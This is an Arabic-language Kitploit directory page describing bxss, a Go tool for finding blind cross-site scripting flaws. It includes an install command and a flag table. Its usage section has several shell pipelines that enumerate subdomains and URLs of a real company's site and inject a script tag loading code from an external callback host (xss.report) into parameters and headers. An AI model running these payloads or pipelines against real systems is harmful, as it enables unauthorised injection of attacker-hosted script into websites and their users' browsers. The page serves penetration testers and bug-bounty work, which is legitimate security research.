Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
bxss — أداة Blind XSS Scanner هي أداة يمكن استخدامها لفحص الثغرات الأمنية الخاصة بـ XSS المخفي (Blind XSS) في تطبيقات الويب. | Kitploit
أدوات/GitHubGitHub/ethicalhackingplayground/bxss
ماسحات الثغرات الأمنيةماسحات الثغرات الأمنية للويبجمع المعلوماتأمن الويباختبار الاختراق
GitHubethicalhackingplayground/bxss

bxss

أداة Blind XSS Scanner هي أداة يمكن استخدامها لفحص الثغرات الأمنية الخاصة بـ XSS المخفي (Blind XSS) في تطبيقات الويب.

عرض المستودع
41855منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة


Bxss
Bxss - ماسح XSS أعمى

الإصدار الترخيص بطاقة تقرير Go مرجع Go


🚀 الوصف

Bxss هو ماسح XSS أعمى عالي الأداء يقوم بأتمتة اكتشاف ثغرات XSS العمياء في تطبيقات الويب.


✨ المميزات

  • حقن حمولات XSS العمياء في العناوين المخصصة والبارامترات
  • دعم طرق HTTP متعددة (PUT, POST, GET, OPTIONS)
  • مسح عالي السرعة مع دعم التزامن
  • سهولة الربط مع الأدوات الأخرى
  • تثبيت واستخدام بسيطان

🧠 قيد التطوير

نعمل حاليًا بنشاط على دمج مجموعة عمال تعتمد على Chromium لتعزيز أداء bxss على الأجهزة منخفضة الإمكانيات.

ستتيح هذه الميزة إسناد المهام كثيفة الموارد، مثل اكتشاف XSS القائم على DOM أو فحص الحمولات بعد التشغيل، إلى مثيلات Chromium خفيفة الوزن تُدار عبر مجموعة. من خلال توزيع عبء العمل عبر سياقات متصفح دون واجهة رسومية بعدد محدود وفعال، سيظل bxss سريع الاستجابة وقابلًا للاستخدام حتى على الأجهزة الأقل إمكانيات.

سيجعل هذا bxss ليس فقط قويًا بل أيضًا سهل الوصول، بغض النظر عن قيود النظام.


✅ قائمة المهام

  • مجموعة عمال Chromium للتفاعل مع DOM والتحقق البصري
  • إخراج تقارير بصيغة HTML/JSON اختياري
  • إضافة دعم لتخصيص الحمولات عبر منصات متعددة (XSS Hunter, Interactsh, إلخ)
  • دعم الوكيل (Proxy)
  • استيراد طلبات مخصصة

🧪 مميزات تجريبية

  • وضع التتبع (تجريبي)

📦 التثبيت

root@kitploit:~
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest

⚙️ الوسائط


🎬 عرض توضيحي

عرض توضيحي


📝 ما هو وضع التتبع؟

وضع التتبع هو ميزة تجريبية تسمح لك بتعقب المكان الذي تم فيه تشغيل BlindXSS، بعض منصات BlindXSS الخارجية مثل https://xss.report/ تتيح لك تحديد بارامترات مخصصة في حمولاتك، وهذا يتيح لك تتبع المكان الذي تم فيه تشغيل BlindXSS، على سبيل المثال إذا حددت البارامتر url=https://somehost.com في حمولتك، ستستخدم الأداة الحمولة

root@kitploit:~
'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'

للاختبار وعند التشغيل، ستتمكن من فحص DOM ورؤية المضيف الذي تم تشغيل BlindXSS منه.

تقرير XSS

تأكد عند تعيين بارامترات مخصصة في لوحة التحكم الخاصة بك من تعيين url={LINK} حتى يتمكن bxss من استبدال {LINK} تلقائيًا بالرابط الفعلي.

🔥 أمثلة استخدام

البارامترات

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t

الإلحاق بالبارامترات

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t

كل من العناوين والبارامترات

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

عنوان X-Forwarded-For

root@kitploit:~
subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"

عناوين وبارامترات مخصصة

root@kitploit:~
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

Google Dorks مع Dorki

root@kitploit:~
curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'

عناوين وبارامترات مخصصة مع حد معدل

root@kitploit:~
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \ 
-t \
-rl 10

للبحث المتقدم عن الثغرات واستكشافها، اطّلع على Dorki واشترك اليوم!


☕ دعم المشروع

إذا حصلت على مكافأة باستخدام هذه الأداة، فكر في دعمي بشراء فنجان قهوة!

اشتر لي قهوة

تنزيل الأداة
الوسيطةالوصفالقيمة الافتراضية
-aإلحاق الحمولة بالبارامترfalse
-c intتعيين مستوى التزامن30
-H stringتعيين عنوان مخصص""
-hf stringمسار ملف يحتوي على عناوين""
-p stringحمولة XSS العمياء""
-pf stringمسار ملف يحتوي على حمولات""
-tاختبار البارامترات للـ XSS الأعمىfalse
-X stringطريقة HTTP المستخدمة""
-vتفعيل وضع التصحيحfalse
-rl floatحد المعدل (طلب في الثانية)0
-fاتباع التوجيهات (Redirects)false
-lتفعيل وضع التتبع (تجريبي)false